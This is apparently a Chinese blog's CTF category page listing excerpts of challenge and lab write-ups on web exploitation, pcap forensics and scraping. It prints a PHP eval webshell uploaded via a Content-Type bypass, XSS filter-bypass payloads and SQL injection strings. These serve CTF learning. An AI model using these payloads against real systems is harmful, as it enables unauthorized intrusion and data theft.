ctf
文章平均质量分 77
wuerror
这个作者很懒,什么都没留下…
展开
-
cengbox3_靶机渗透
未曾设想的道路这个靶机做起来问题挺多的,可能是我用的VMware的缘故。最终也没做到最后开局arpscan,nmap各种方式扫了一圈都未能成功获取到靶机IP。通过救援模式进入shell修改网卡配置解决。具体可以参考链接,改完之后虚拟机也要重启一次,才能正常使用,信息收集nmap先扫一波开放端口nmap -sV 192.168.218.130 -p 1-65535Host is up (0.00064s latency).Not shown: 997 filtered ports原创 2021-03-18 22:31:39 · 639 阅读 · 0 评论 -
关于php异或的脚本
最近做了道使用异或绕过preg_match()的题,正则的要求是没有字母数字。网上翻文章,搜集了两个脚本#朋友给的,也不知道最早是哪个师傅写的def encode(command): code = "~`!@#$%&*()-=+_[]{};:<>,.?/|" result_1 = "" result_2 = "" for x in command: if not command.isalpha(): r原创 2020-07-26 11:35:33 · 1378 阅读 · 0 评论 -
i春秋练习——第三届“百越杯”福建省高校网络空间安全大赛-web-do you know upload
首先是一个文件上传,比较基础。选择上传111.php,内容是一句话马<?php eval($_POST['cmd']);?>burpsuit抓包修改Content-Type为image/gif(任一种图片都行),这类漏洞可以搭建一个upload-lab本地练一练。显示上传成功接下来使用蚁剑连接,连接密码就是之前一句话写的cmd,编码器可以选default,这题没...原创 2020-01-07 11:48:36 · 573 阅读 · 0 评论 -
bugkuctf-分析-菜刀
1.打开下载的压缩包,里面是个pcapng文件。用wireshark打开。先看看http包比较少而且info里也没什么特别的信息,每个点开看看在第四个包里发现了一句话,重点来了!看下一个包,他做了什么。选中第五个包,右键选择追踪HTTP流base64解码$xx(' ')引号内的内容发现他尝试读取flag.tar.gz文件,且在头尾输出了X@Y.接着看第六个H...原创 2019-02-01 17:05:13 · 1206 阅读 · 0 评论 -
HCTF2018-warmup-writeup
这个题目原型是phpmyadmin4.8.1的任意文件包含漏洞 点击hint进入,得到提示flag在ffffllllaaaagggg中,并发现URL格式为XXX/index.php?file=hint.php,顺势猜一下file=source.php有没有结果。得到如下<?php class emmm { public static functi...原创 2019-01-22 21:54:31 · 3465 阅读 · 0 评论 -
记docker复现CTF题的一次流程
我使用的虚拟机是18.04Ubuntu1.安装docker,这一步挺多教程的,就不详细说了。2.在菜鸟课程学习了一下docker的基础教程。几个常用到的命令:(1)docker image 查看本地的docker镜像(2)docker ps 查看正在运行的docker(3)docker run [options] image [command] [arg...]用到的...原创 2019-01-23 14:59:14 · 5094 阅读 · 1 评论 -
hgame第一周wp
Write up----wuerrorWeb(1)谁吃了我的flag根据hint,推测是未正常关闭的vim备份文件泄露访问:http://118.25.111.31:10086/.index.html.swp下载该文件,使用vim -r .index.html.swp恢复得到flag(2)换头大作战随便输入一个值,回显:request method is error.I thin...原创 2019-02-23 20:55:56 · 437 阅读 · 0 评论 -
hgameweek2-wp
week2-wpwuerrorwebeasy php使用…/./来绕过str_replace(`'../', '', $img`)?img=…/./flag可以得到回显maybe_you_should_think_think再想想,试试伪协议读取文件看看伪协议:?img=php://filter/read=convert.base64-encode/resource=…/...原创 2019-02-23 20:56:37 · 766 阅读 · 3 评论 -
hgame week3
week3-wpwuerrorweb1.sqli-1首先写个脚本过codeimport hashlibfrom multiprocessing.dummy import Pool as ThreadPool# MD5截断数值已知 求原始数据# 例子 substr(md5(captcha), 0, 6)=60b7ef|| substr(md5($_GET["code"]),0,4)...原创 2019-02-23 20:57:16 · 602 阅读 · 0 评论 -
hgame week4-writeup
week4-writeupwuerrorwebhappy python{u’csrf_token’: u’a844480fd5e2cd4c8e3107765aa25923572cd2df’, u’_fresh’: True, u’user_id’: u’admin’, u’_id’: u’051101fca32cbd279dfd6e96892ec55881e06fcb6a52872d04c...原创 2019-02-23 20:57:48 · 634 阅读 · 0 评论 -
iscc2019
iscc2019miscwelcome加上后缀zip,打开将“蓅烺計劃 洮蓠朩暒”替换为0,“戶囗 萇條”替换为1。得到二进制串01100110011011000110000101100111011110110100100101010011010000110100001101011111010101110100010101001100010000110100111101001101010...原创 2019-06-05 08:30:49 · 1018 阅读 · 0 评论 -
BUUCTF-easy_tornado
这题是2018护网杯原题的复现。进去之后显示三个txt,每个点进去看看。内容如下:/flag.txtflag in /fllllllllllllag/welcome.txtrender/hints.txtmd5(cookie_secret+md5(filename))看看url,发现web9.buuoj.cn/file?filename=/flag.txt&fil...原创 2019-07-07 16:17:21 · 3667 阅读 · 0 评论 -
BUUCTF-强网杯-随便注
引用:https://www.cnblogs.com/Mikasa-Ackerman/p/11050033.html1‘ //首先尝试的加引号,报错了1’ # //正常1‘ order by 1 # //用order by 测试得到列数为21' union select 1,2 # //回显了过滤规则 return preg_match("/select|update|delete|d...原创 2019-06-30 19:06:04 · 6553 阅读 · 0 评论 -
NCTF2018web-wp
签到题:访问indexphp,页面301跳转,在cookie里找到flag待续原创 2019-01-24 19:53:23 · 583 阅读 · 0 评论 -
恐龙的特性
当代码中存在$_REQUEST['user_id']里面类似的参数的时候,我们在url上可以这样a.php?user.id传参去进行绕过,这样进去之后也能表示$_REQUEST['user_id']的值,同样可以绕过的符号还有+,[ 等,应该说是php的一个小特性,上面讲的很清楚了,?A_A可以用?A+A表示---------------------作者:0verWatch来源:CSDN...转载 2018-10-19 18:08:41 · 1117 阅读 · 0 评论 -
淘宝商品信息定向爬虫
import requestsimport re这篇是学习网课,主要使用的是正则表达式匹配。def getHTMLText(url): try: headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'} r=...原创 2018-06-26 18:21:18 · 712 阅读 · 0 评论 -
ctf简单的SQL注入(1)
ctf注入套路(一):从系统内置的库来找到flag所在的表。例子:点击打开链接(实验吧简单的SQL注入之2,1也是同样的套路)先输入1,再输入1',页面报语法错误,再输入1 '页面出现SQLi detected!,推出空格被它过滤。用/**/来代替空格。输入 1'/**/union/**/select/**/schema_name/**/from/**/information_schema.sch...原创 2018-07-14 20:31:28 · 2379 阅读 · 0 评论 -
bugkuctf cookies欺骗wp
老实说这道题有点绕,也可能是我比较菜。点开题目链接发现URL是这样的:"http://120.24.86.145:8002/web11/index.php?line=&filename=a2V5cy50eHQ=" 然后对filename进行base64解码,发现是keys.txt,诶有点莫名其妙,看一看别人的wp,把keys.txt换成index.php的ba...原创 2018-08-05 15:55:02 · 804 阅读 · 1 评论 -
bugkuctf never give up
这题要留意页面源码里的文本信息,我开头没注意去抓包,啥也没发现。回头看发现源码有一个1p.html.访问一下view-source:http://120.24.86.145:8006/test/1p.html得到<HTML><HEAD><SCRIPT LANGUAGE="Javascript"><!--var Words ="%3...原创 2018-08-05 20:13:32 · 1288 阅读 · 0 评论 -
bugkuctf 文件包含2 writeup
首先看网页源代码,发现访问upload.php,进入上传页面。 要求上传图片,开始构造一句话图片马。因为初学,一句话不太熟只知道<?php @eval($_post[a]);?> 把这句话加在图片(改为txt格式)的最后,再改回jpg。上传之后访问该图的存储路径,发现post数据没有反应。显示出来的我的"一句话"语句好像两头被转义了。想了好久不知道怎么办,...原创 2018-08-07 20:38:39 · 1594 阅读 · 0 评论 -
bugkuctf 社工-王晓明的日记
社工的题还是有意思。根据题目提示找到bugku在线工具里的社工密码生成器,把相关信息输入,再把生成的密码存进txt。然后用burpsuite_intruder爆破一下就有了。...原创 2018-08-08 09:39:46 · 1924 阅读 · 0 评论 -
web_for_pentester_I_XSS
example1:<script>alert(1)</script> 直接弹窗example2:<Script>alert(1)</scriPt> 大小写绕过弹窗example3:<Sc<script>ript>alert(1)</sc</script>riPt>双写绕过ex原创 2018-08-15 17:30:42 · 964 阅读 · 1 评论 -
bugkuctf 密码学_简单加密writeup
密文:e6Z9i~]8R~U~QHE{RnY{QXg~QnQ{^XVlRXlp^XI5Q6Q6SKY8jUAA因为末尾是AA与base64结尾的==相似,推断为base64和凯撒加密的结合。=的ascii码为61,A为65.即前移四位。首先将其转换为ASCII码(在线工具)为:101,54,90,57,105,126,93,56,82,126,85,126,81,72,69,123,8...原创 2018-08-08 16:00:39 · 3154 阅读 · 0 评论 -
bugkuctf_web flag.php
根据提示,访问:http://120.24.86.145:8002/flagphp/?hint=1得到源码观察可知要构造cookie:IScer=XXX,这个XXX是$key序列化之后的值。一个坑在这个key的值,不是下面给的结果(www.isecer.com),而是NULL。因为key的值在上面还未定义(此处要感谢大佬的wp)...原创 2018-08-13 16:44:36 · 1495 阅读 · 0 评论 -
实验吧-猫抓老鼠
题目暗示抓包,使用burpsuite。直接提交 Content-Row即可得到key,这里遇到的坑是我下意识把它先base64解码之后再提交了。。。原创 2018-08-22 15:13:51 · 358 阅读 · 0 评论 -
web_for_pentester_I_sql example1-6
example1,2,3:这几个放一块说吧,主要是刚好做完前三个。三个差不多,2和3感觉一样都是在1的基础上过滤了空格。先说example3:1.http://192.168.218.131/sqli/example3.php?name=root 。注入点是name,先加个分号测试一下,发现查询失败。2.http://192.168.218.131/sqli/example3.php?...原创 2018-08-17 13:47:55 · 376 阅读 · 0 评论 -
bugkuctf-erag截断
<?phpif (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$",$_GET['password']) === FALSE) { echo '<p>You password must be alphanumeric</p>'; } else...原创 2018-08-20 09:51:01 · 290 阅读 · 0 评论 -
一个爬取网站文章、图片的小爬虫(有待完善)
import requestsimport refrom bs4 import BeautifulSoupimport osdef getHTMLText(url): try: headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox...原创 2018-06-06 08:32:11 · 880 阅读 · 3 评论